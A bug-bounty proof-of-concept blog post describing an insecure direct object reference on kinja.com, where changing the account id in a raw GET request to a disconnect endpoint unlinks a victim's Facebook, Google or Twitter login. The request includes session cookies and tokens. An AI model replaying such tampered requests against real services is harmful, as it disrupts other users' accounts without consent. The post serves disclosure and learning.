KINJA.COM IDOR BUG WORTH 1000$

[ads]

Kinja IDOR Poc – Bug Bounty POC

This post is published by Ruisilva as a contributor on Bug Bounty POC .Note that the post is written by Ruisilva & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform just sign up on blog and you can post freely.

Hi my name is Rui Silva and i found a IDOR vulnerability on Kinja.com

Steps to reproduce:

First this vulnerability only works if your account was login via Connect to Facebook Button

This is a GET Request for disconnect any social media from your account looks like this:

GET /api/profile/account/<account_id>/disconnect?provider=google&token=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a&jsonp=jQuery211027393518528777927_1437691862794 HTTP/1.1
Host: kinja.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://kinja.com/settings
Cookie: ka=85c343a0-aec6-43ce-804f-5b1778512994|5334a9b2-808b-4648-9137-b143feea3d26|1437690908546; __k_iut=1436869611979; _cb_ls=1; _chartbeat2=CgfSMpl8BpelgLqd.1436869612907.1437691865015.1000000001; _ga=GA1.2.2138116728.1436869499; __qca=P0-673955367-1436869613038; cto_gawk=; fbm_36368793975=base_domain=.kinja.com; pageDepth=5; KinjaSession=228086f8-1572-4f89-9f67-b7c7215e15e6; fbsr_36368793975=NSp9fPMWHKe-4VcmDjw-kz2s2OeO9t-CCQIGPI8Jg2g.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUJDX1ZyOUZibEZMY3d2cGd0TVliSVVQWEYwRUdIY0dYdjdzMXBOLUVGZG54MmRqQjVEd3ctbmdSQl9TSy1HTUFFY0hLTG1va21Ub2R4OWZtVHJzTnFRUDU4TnpHekM3SzdvQW1kU1MwSjR2UUZNWTkwSmo3ZHJXVTNHVmlzZWRXNmMzQXZhQlNqY2oxVUxONXZqS3lPNVd2UVcycnVTX3VmVFZoYm1SdVU5MXd6NFM1VHBRemwxOWZlN1F3cHdhY2d6aEd5ejI2aHpaSnVRbGF3ZlM4OWo3ZW5UclFiNE9rY3YzbUNPd1hwem9tWXRKZ2hlZjN6Y29NZ05PRDJQY0o4WndvTTZGVDdWZ0VZaG8wZnBnTG0tcmVfWG03VEpsbkdrYVBzdTBEQVhXMlBwTTk0RE0tUU9jOFlWQ3h2anE0bXNQbUNwZld3bThGQmZERUN3RG9xLSIsImlzc3VlZF9hdCI6MTQzNzY4OTE0NCwidXNlcl9pZCI6IjE2MTg0MjUwNjUxMTI1MTIifQ; geocc=PT; KinjaRememberMe=5876237249235904615|228086f8-1572-4f89-9f67-b7c7215e15e6; kinjaads.displayName=Silva; kinjaads.isBurner=false; _gat=1; KinjaToken=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a
Connection: keep-alive

It was observed that by simply changing the value of <account_id> in the above URL. You can disconnect any of social media of victim accounts.

If account was login with facebook i can disconnect victim from twitter and google
If account was login with twitter i can disconnect victim from facebook and google
If account was login with google i can disconnect victim from twitter and facebook

All you have to do is change victim id on request above and on provider= parameter change it for any social network you are connected
Thanks

IMPACT:

I can disconnect any account who was login via Connect to Facebook Function

Thanks

You may also like...

2 Responses

  1. Gaylord Ende says:

    I think this web site contains some rattling wonderful info for everyone :D. “Time–our youth–it never really goes, does it It is all held in our minds.” by Helen Hoover Santmyer.

  2. mr r says:

    But could u guesss the victim id?

Leave a Reply

Your email address will not be published. Required fields are marked *